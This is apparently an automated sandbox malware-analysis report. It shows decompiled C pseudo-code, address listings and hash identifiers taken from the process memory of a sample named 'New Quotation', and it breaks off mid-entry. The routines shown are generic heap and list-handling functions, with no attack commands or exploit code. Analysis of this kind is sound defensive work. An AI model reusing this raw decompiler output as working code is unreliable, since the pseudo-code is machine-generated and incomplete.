                                                                                                                                                                                          0x1d833749
                                                                                                                                                                                          0x1d7db974
                                                                                                                                                                                          0x1d7db977
                                                                                                                                                                                          0x1d7db97c
                                                                                                                                                                                          0x1d83375a
                                                                                                                                                                                          0x1d83376c
                                                                                                                                                                                          0x1d83375c
                                                                                                                                                                                          0x1d833765
                                                                                                                                                                                          0x1d833765
                                                                                                                                                                                          0x1d833776
                                                                                                                                                                                          0x1d833776
                                                                                                                                                                                          0x1d7db99c
                                                                                                                                                                                          0x1d7db99e
                                                                                                                                                                                          0x1d7db9a3
                                                                                                                                                                                          0x1d833783
                                                                                                                                                                                          0x1d833792
                                                                                                                                                                                          0x1d833792
                                                                                                                                                                                          0x1d833783
                                                                                                                                                                                          0x1d7db9ac
                                                                                                                                                                                          0x1d8337a4
                                                                                                                                                                                          0x1d8337af
                                                                                                                                                                                          0x1d8337af
                                                                                                                                                                                          0x1d8337bd
                                                                                                                                                                                          0x1d8337bd
                                                                                                                                                                                          0x1d7db9ba
                                                                                                                                                                                          0x1d7db9ba
                                                                                                                                                                                          0x1d7db972
                                                                                                                                                                                          0x1d7db972
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 06fb22525c50e420c6af04fb67ef17db8c909e884c107680bbb5f363a0e34d0c
                                                                                                                                                                                          • Instruction ID: 98cdda56ad9ff30f352e149603cbce58096a8ae4907e680ea3b3c12f260e61c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 06fb22525c50e420c6af04fb67ef17db8c909e884c107680bbb5f363a0e34d0c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 352123B6205AD0EBD3028F1CD950B2473A9FF48B61F0940A2FD448B7E1D639ED00C6A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D867C38 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D867C38(signed char* __ecx, signed int __edx, signed char* _a4, signed int _a8, intOrPtr _a12, signed int _a16, char _a20, intOrPtr _a24, signed int* _a28, signed int _a32) {
				char _v8;
				signed int _v12;
				signed char* _v16;
				signed int _v20;
				char _t23;
				signed int _t24;
				void* _t25;
				signed int _t31;
				intOrPtr _t33;
				signed int _t39;
				void* _t41;
				signed int* _t43;

				_t35 = __ecx;
				_v12 = _v12 & 0x00000000;
				_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t23 = 0x400;
				_t43 = _a28;
				_t39 = __edx;
				_v16 = __ecx;
				_v20 = __edx;
				_v8 = 0x400;
				while(1) {
					_t24 = E1D7E5D90(_t35, _t33, 0, _t23);
					 *_t43 = _t24;
					if(_t24 == 0) {
						break;
					}
					_t35 = _v16;
					_t41 = E1D867A51(_v16, _t39, _a4, _a8, _a12, _a16, _a20, _a24,  &_v8, _t24, _a32);
					if(_t41 >= 0) {
						if(_v8 == 0) {
							E1D7E3BC0(_t33, 0,  *_t43);
							 *_t43 =  *_t43 & 0x00000000;
						}
						L8:
						_t25 = _t41;
						L10:
						return _t25;
					}
					E1D7E3BC0(_t33, 0,  *_t43);
					 *_t43 =  *_t43 & 0x00000000;
					if(_t41 != 0xc0000023) {
						goto L8;
					}
					_t31 = _v12 + 1;
					_v12 = _t31;
					if(_t31 >= 2) {
						goto L8;
					}
					_t23 = _v8;
					_t39 = _v20;
				}
				_t25 = 0xc0000017;
				goto L10;
			}















                                                                                                                                                                                          0x1d867c38
                                                                                                                                                                                          0x1d867c46
                                                                                                                                                                                          0x1d867c4c
                                                                                                                                                                                          0x1d867c4f
                                                                                                                                                                                          0x1d867c54
                                                                                                                                                                                          0x1d867c58
                                                                                                                                                                                          0x1d867c5a
                                                                                                                                                                                          0x1d867c5d
                                                                                                                                                                                          0x1d867c60
                                                                                                                                                                                          0x1d867c63
                                                                                                                                                                                          0x1d867c67
                                                                                                                                                                                          0x1d867c6c
                                                                                                                                                                                          0x1d867c70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867c75
                                                                                                                                                                                          0x1d867c96
                                                                                                                                                                                          0x1d867c9a
                                                                                                                                                                                          0x1d867cc9
                                                                                                                                                                                          0x1d867cd0
                                                                                                                                                                                          0x1d867cd5
                                                                                                                                                                                          0x1d867cd5
                                                                                                                                                                                          0x1d867cd8
                                                                                                                                                                                          0x1d867cd8
                                                                                                                                                                                          0x1d867ce1
                                                                                                                                                                                          0x1d867ce5
                                                                                                                                                                                          0x1d867ce5
                                                                                                                                                                                          0x1d867ca1
                                                                                                                                                                                          0x1d867ca6
                                                                                                                                                                                          0x1d867caf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867cb4
                                                                                                                                                                                          0x1d867cb5
                                                                                                                                                                                          0x1d867cbb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d867cbd
                                                                                                                                                                                          0x1d867cc0
                                                                                                                                                                                          0x1d867cc0
                                                                                                                                                                                          0x1d867cdc
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                                                                                          • Instruction ID: fec5d3509875cacb4226ff1e7df70a0e0334ca09eeabbcfdecdcdc5e6b2f4bcb
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee17a0d1079a4772c603ff45f84419bb43025fe42eb990e5d19e7a9d1d14c39e
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8215B72900209BFDF229F98CC40FAEBBB9EF48321F214455F905A7250E674D951DBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F9938 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E1D7F9938(void* __eax, intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _t25;
				intOrPtr* _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t36;
				intOrPtr _t37;
				intOrPtr* _t38;
				intOrPtr _t40;
				void* _t41;

				_t33 = __ecx;
				if(( *(__ecx + 0x34) & 0x00000040) != 0) {
					_t4 = _t33 + 0x3c; // -112
					_t25 = _t4;
					_t40 =  *_t25;
					if( *((intOrPtr*)(_t40 + 4)) != _t25) {
						L9:
						_t34 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t34);
						_v12 = _v12 & 0x00000000;
						_push(_t40);
						_t41 = E1D7F9A00(_t34, _v0, _a4,  &_v12);
						if(_t41 != 0) {
							E1D7FAB30(_t41);
						} else {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _v8);
						}
						return _t41;
					} else {
						_t36 =  *((intOrPtr*)(_t25 + 4));
						if( *_t36 != _t25) {
							goto L9;
						} else {
							 *_t36 = _t40;
							 *((intOrPtr*)(_t40 + 4)) = _t36;
							_t37 =  *__ecx;
							if( *((intOrPtr*)(_t37 + 4)) != __ecx) {
								goto L9;
							} else {
								_t31 =  *((intOrPtr*)(__ecx + 4));
								if( *_t31 != __ecx) {
									goto L9;
								} else {
									 *_t31 = _t37;
									 *((intOrPtr*)(_t37 + 4)) = _t31;
									_t11 = _t33 + 8; // -164
									_t38 = _t11;
									_t40 =  *_t38;
									if( *((intOrPtr*)(_t40 + 4)) != _t38) {
										goto L9;
									} else {
										_t32 =  *((intOrPtr*)(_t38 + 4));
										if( *_t32 != _t38) {
											goto L9;
										} else {
											 *_t32 = _t40;
											 *((intOrPtr*)(_t40 + 4)) = _t32;
											 *(__ecx + 0x34) =  *(__ecx + 0x34) & 0xffffffbf;
											return _t32;
										}
									}
								}
							}
						}
					}
				} else {
					return __eax;
				}
			}
















                                                                                                                                                                                          0x1d7f9938
                                                                                                                                                                                          0x1d7f993c
                                                                                                                                                                                          0x1d7f993f
                                                                                                                                                                                          0x1d7f993f
                                                                                                                                                                                          0x1d7f9943
                                                                                                                                                                                          0x1d7f9948
                                                                                                                                                                                          0x1d7f9985
                                                                                                                                                                                          0x1d7f9987
                                                                                                                                                                                          0x1d7f9988
                                                                                                                                                                                          0x1d7f998a
                                                                                                                                                                                          0x1d7f998b
                                                                                                                                                                                          0x1d7f998c
                                                                                                                                                                                          0x1d7f998d
                                                                                                                                                                                          0x1d7f998e
                                                                                                                                                                                          0x1d7f998f
                                                                                                                                                                                          0x1d7f9995
                                                                                                                                                                                          0x1d7f9996
                                                                                                                                                                                          0x1d7f999d
                                                                                                                                                                                          0x1d7f99aa
                                                                                                                                                                                          0x1d7f99ae
                                                                                                                                                                                          0x1d7f99cb
                                                                                                                                                                                          0x1d7f99b0
                                                                                                                                                                                          0x1d7f99be
                                                                                                                                                                                          0x1d7f99be
                                                                                                                                                                                          0x1d7f99c7
                                                                                                                                                                                          0x1d7f994a
                                                                                                                                                                                          0x1d7f994a
                                                                                                                                                                                          0x1d7f994f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9951
                                                                                                                                                                                          0x1d7f9951
                                                                                                                                                                                          0x1d7f9953
                                                                                                                                                                                          0x1d7f9956
                                                                                                                                                                                          0x1d7f995b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f995d
                                                                                                                                                                                          0x1d7f995d
                                                                                                                                                                                          0x1d7f9962
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9964
                                                                                                                                                                                          0x1d7f9964
                                                                                                                                                                                          0x1d7f9966
                                                                                                                                                                                          0x1d7f9969
                                                                                                                                                                                          0x1d7f9969
                                                                                                                                                                                          0x1d7f996c
                                                                                                                                                                                          0x1d7f9971
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9973
                                                                                                                                                                                          0x1d7f9973
                                                                                                                                                                                          0x1d7f9978
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f997a
                                                                                                                                                                                          0x1d7f997a
                                                                                                                                                                                          0x1d7f997c
                                                                                                                                                                                          0x1d7f997f
                                                                                                                                                                                          0x1d7f9984
                                                                                                                                                                                          0x1d7f9984
                                                                                                                                                                                          0x1d7f9978
                                                                                                                                                                                          0x1d7f9971
                                                                                                                                                                                          0x1d7f9962
                                                                                                                                                                                          0x1d7f995b
                                                                                                                                                                                          0x1d7f994f
                                                                                                                                                                                          0x1d7f993e
                                                                                                                                                                                          0x1d7f993e
                                                                                                                                                                                          0x1d7f993e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                                                                                          • Instruction ID: a23d6b221af434beecfe5ef129373f19ab390eaacf7cb4aee5a52978fdc70742
                                                                                                                                                                                          • Opcode Fuzzy Hash: a612bbf784feb212866b1a0590369a02d4dcf82f1c94ffcec620604e6849556b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5214AB2501252DFC721CF15C500959FBAAFF82325B56C1AAE55C8B320D732E942CBC2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80BF0C Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D80BF0C(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t18;
				char* _t22;
				char* _t28;
				signed char _t34;
				signed char _t35;
				void* _t47;
				intOrPtr* _t48;

				_t47 = __edx;
				_t48 = __ecx;
				if(( *0x1d8c6638 & 0x00000004) == 0) {
					_t18 =  *(__ecx + 0x5c) & 0x0000ffff;
					if(_t18 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0x1d7ab518 + _t18 * 2) & 0x0000ffff) << 4) {
						goto L1;
					} else {
						asm("sbb bl, bl");
						_t35 = _t34 & 0x00000001;
						L2:
						if(E1D7E3C40() != 0) {
							_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t22 = 0x7ffe038a;
						}
						if( *_t22 != 0) {
							L16:
							if(_t35 != 0) {
								E1D88F38A(_t35,  *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc)) + 0xc)),  *((intOrPtr*)(_t47 + 4)),  *(_t48 + 0x5c) & 0x0000ffff);
							}
							goto L8;
						} else {
							if(E1D7E3C40() != 0) {
								_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t28 = 0x7ffe0380;
							}
							if( *_t28 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
									goto L8;
								}
								goto L16;
							} else {
								L8:
								return _t35;
							}
						}
					}
				}
				L1:
				_t35 = 0;
				goto L2;
			}











                                                                                                                                                                                          0x1d80bf16
                                                                                                                                                                                          0x1d80bf18
                                                                                                                                                                                          0x1d80bf1a
                                                                                                                                                                                          0x1d80bf5a
                                                                                                                                                                                          0x1d80bf61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80bf75
                                                                                                                                                                                          0x1d829688
                                                                                                                                                                                          0x1d82968a
                                                                                                                                                                                          0x1d80bf1e
                                                                                                                                                                                          0x1d80bf25
                                                                                                                                                                                          0x1d82969a
                                                                                                                                                                                          0x1d80bf2b
                                                                                                                                                                                          0x1d80bf2b
                                                                                                                                                                                          0x1d80bf2b
                                                                                                                                                                                          0x1d80bf33
                                                                                                                                                                                          0x1d8296ca
                                                                                                                                                                                          0x1d8296cc
                                                                                                                                                                                          0x1d8296e2
                                                                                                                                                                                          0x1d8296e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80bf39
                                                                                                                                                                                          0x1d80bf40
                                                                                                                                                                                          0x1d8296ad
                                                                                                                                                                                          0x1d80bf46
                                                                                                                                                                                          0x1d80bf46
                                                                                                                                                                                          0x1d80bf46
                                                                                                                                                                                          0x1d80bf4e
                                                                                                                                                                                          0x1d8296c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80bf56
                                                                                                                                                                                          0x1d80bf56
                                                                                                                                                                                          0x1d80bf59
                                                                                                                                                                                          0x1d80bf59
                                                                                                                                                                                          0x1d80bf4e
                                                                                                                                                                                          0x1d80bf33
                                                                                                                                                                                          0x1d80bf61
                                                                                                                                                                                          0x1d80bf1c
                                                                                                                                                                                          0x1d80bf1c
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 25ac9408cd6b43c29d8f16845f46fb3e896db8cea88fc899f4162a66eb421d1a
                                                                                                                                                                                          • Instruction ID: de2660c62b9f12f1ccf696c93ee9f9c761c2ca93fa003207742ae62f7387d2ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25ac9408cd6b43c29d8f16845f46fb3e896db8cea88fc899f4162a66eb421d1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE115679281591CFD3158F28C890772B3E4FB09B54F0848AAF9898B751D369F8C0CB22
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D2E32 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E1D7D2E32(intOrPtr _a4) {
				void* __ecx;
				signed int _t10;
				intOrPtr _t17;
				void* _t18;
				signed int _t27;
				signed int _t28;
				void* _t29;

				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if(E1D8261D5() != 0) {
					_push(5);
				} else {
					_push("true");
				}
				_pop(_t28);
				_t27 = _t28;
				if( *0x1d8c6614 == 0) {
					L7:
					_t10 =  *0x1d8c67d8; // 0x1
					if(_t10 == 0) {
						_t10 = E1D80A965(0x1d7a1740, 1, 0x1d8c67d8);
					}
					_t29 = E1D7D2EE8(0x1d7a6e30 + _t10 * 0x14, _t28, _a4, 0);
				} else {
					L1D7D53C0(0x1d8c67d4);
					if( *0x1d8c6614 == 0) {
						E1D7D52F0(_t18, 0x1d8c67d4);
						goto L7;
					} else {
						_t29 = E1D7D2EE8(0x1d7a6e6c, _t27, _a4, 0);
						E1D7D52F0(0x1d7a6e6c, 0x1d8c67d4);
					}
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t17;
					 *((char*)(_t29 + 0x48)) = 0;
				}
				return _t29;
			}










                                                                                                                                                                                          0x1d7d2e44
                                                                                                                                                                                          0x1d7d2e51
                                                                                                                                                                                          0x1d7d2e57
                                                                                                                                                                                          0x1d7d2e53
                                                                                                                                                                                          0x1d7d2e53
                                                                                                                                                                                          0x1d7d2e53
                                                                                                                                                                                          0x1d7d2e60
                                                                                                                                                                                          0x1d7d2e61
                                                                                                                                                                                          0x1d7d2e63
                                                                                                                                                                                          0x1d7d2ea1
                                                                                                                                                                                          0x1d7d2ea1
                                                                                                                                                                                          0x1d7d2ea8
                                                                                                                                                                                          0x1d7d2eb7
                                                                                                                                                                                          0x1d7d2eb7
                                                                                                                                                                                          0x1d7d2ed1
                                                                                                                                                                                          0x1d7d2e65
                                                                                                                                                                                          0x1d7d2e6a
                                                                                                                                                                                          0x1d7d2e76
                                                                                                                                                                                          0x1d7d2e9c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2e78
                                                                                                                                                                                          0x1d7d2e8e
                                                                                                                                                                                          0x1d7d2e90
                                                                                                                                                                                          0x1d7d2e90
                                                                                                                                                                                          0x1d7d2e76
                                                                                                                                                                                          0x1d7d2ed5
                                                                                                                                                                                          0x1d7d2ed7
                                                                                                                                                                                          0x1d7d2eda
                                                                                                                                                                                          0x1d7d2eda
                                                                                                                                                                                          0x1d7d2ee5

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8401b82d8965d3bfc20b902711ec2bdee8faf6886cf43ee17aff843d2c5a8328
                                                                                                                                                                                          • Instruction ID: 86baacc630f34823f7440564ef73db8ceae0806bfb7ffa4fc05a140ad1f62545
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8401b82d8965d3bfc20b902711ec2bdee8faf6886cf43ee17aff843d2c5a8328
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4112575308B20EFD3509719ECC9FBBB695AF40A78F59052EE60597671C930F842C293
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D09F0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7D09F0(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _t25;
				short _t32;
				intOrPtr _t41;
				intOrPtr* _t44;
				short* _t45;

				_t25 = 0x68;
				_t44 = __ecx;
				_t41 = __edx;
				 *__ecx =  *__ecx & 0x00000000;
				_t45 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25);
				if(_t45 == 0) {
					return 0xc0000017;
				}
				E1D818F40(_t45 + 4, 0, 0x64);
				 *_t44 = _t45;
				 *_t45 = 0x914;
				_t32 = 0x68;
				 *((short*)(_t45 + 2)) = _t32;
				 *((intOrPtr*)(_t45 + 0x18)) =  *((intOrPtr*)( *[fs:0x18] + 0xf60));
				 *((intOrPtr*)(_t45 + 0x10)) = _a4;
				 *((intOrPtr*)(_t45 + 0x14)) = _a8;
				 *((intOrPtr*)(_t45 + 0x28)) = _a12;
				 *((intOrPtr*)(_t45 + 0x20)) = _a16;
				 *((intOrPtr*)(_t45 + 0x24)) = _a20;
				 *((intOrPtr*)(_t45 + 0x1c)) = _t41;
				 *((intOrPtr*)(_t45 + 0xc)) = 0;
				 *((intOrPtr*)(_t45 + 0x2c)) = 1;
				 *((intOrPtr*)(_t45 + 0x30)) = 0;
				 *((intOrPtr*)(_t45 + 0x34)) = 0;
				 *((intOrPtr*)(_t45 + 0x38)) = 0;
				 *((intOrPtr*)(_t45 + 0x3c)) = 0;
				 *((intOrPtr*)(_t45 + 0x60)) = 0;
				 *((intOrPtr*)(_t45 + 0x64)) = 0;
				return 0;
			}








                                                                                                                                                                                          0x1d7d09fa
                                                                                                                                                                                          0x1d7d0a02
                                                                                                                                                                                          0x1d7d0a06
                                                                                                                                                                                          0x1d7d0a0b
                                                                                                                                                                                          0x1d7d0a13
                                                                                                                                                                                          0x1d7d0a17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d0a8f
                                                                                                                                                                                          0x1d7d0a21
                                                                                                                                                                                          0x1d7d0a29
                                                                                                                                                                                          0x1d7d0a30
                                                                                                                                                                                          0x1d7d0a35
                                                                                                                                                                                          0x1d7d0a36
                                                                                                                                                                                          0x1d7d0a46
                                                                                                                                                                                          0x1d7d0a4c
                                                                                                                                                                                          0x1d7d0a52
                                                                                                                                                                                          0x1d7d0a58
                                                                                                                                                                                          0x1d7d0a5e
                                                                                                                                                                                          0x1d7d0a64
                                                                                                                                                                                          0x1d7d0a69
                                                                                                                                                                                          0x1d7d0a6c
                                                                                                                                                                                          0x1d7d0a6f
                                                                                                                                                                                          0x1d7d0a76
                                                                                                                                                                                          0x1d7d0a79
                                                                                                                                                                                          0x1d7d0a7c
                                                                                                                                                                                          0x1d7d0a7f
                                                                                                                                                                                          0x1d7d0a82
                                                                                                                                                                                          0x1d7d0a85
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
                                                                                                                                                                                          • Instruction ID: e73e2f112a723812f87feffc196d12e32df60904aedfc42ccb00fc23ba26fef8
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: A921F7B5A00B459FD3A0CF29D441B52BBF4FB48B20F10492AE989C7B50E371F814CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D805921 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E1D805921(unsigned int __ecx, signed short* __edx, signed int _a4, signed int _a8, signed int* _a12, char _a16) {
				unsigned int _v8;
				signed short* _t12;
				signed short* _t21;
				void* _t22;
				signed short* _t30;
				void* _t33;

				_push(__ecx);
				_t21 = __edx;
				_v8 = __ecx;
				_t12 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x3fe);
				_t25 =  *[fs:0x30];
				_t30 = _t12;
				_t33 = E1D7E5D90( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x406);
				if(_t30 == 0 || _t33 == 0) {
					_t22 = 0xc0000017;
				} else {
					_t22 = E1D8059BC(_v8, _t21, _a4, _a8, _a12, _a16, _t30, _t25, _t33, _t25);
				}
				if(_t30 != 0) {
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t30);
				}
				if(_t33 != 0) {
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				}
				return _t22;
			}









                                                                                                                                                                                          0x1d805926
                                                                                                                                                                                          0x1d80593a
                                                                                                                                                                                          0x1d80593c
                                                                                                                                                                                          0x1d80593f
                                                                                                                                                                                          0x1d805944
                                                                                                                                                                                          0x1d80594b
                                                                                                                                                                                          0x1d80595c
                                                                                                                                                                                          0x1d805960
                                                                                                                                                                                          0x1d8059b5
                                                                                                                                                                                          0x1d805966
                                                                                                                                                                                          0x1d805980
                                                                                                                                                                                          0x1d805980
                                                                                                                                                                                          0x1d805984
                                                                                                                                                                                          0x1d805992
                                                                                                                                                                                          0x1d805992
                                                                                                                                                                                          0x1d805999
                                                                                                                                                                                          0x1d8059a7
                                                                                                                                                                                          0x1d8059a7
                                                                                                                                                                                          0x1d8059b2

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
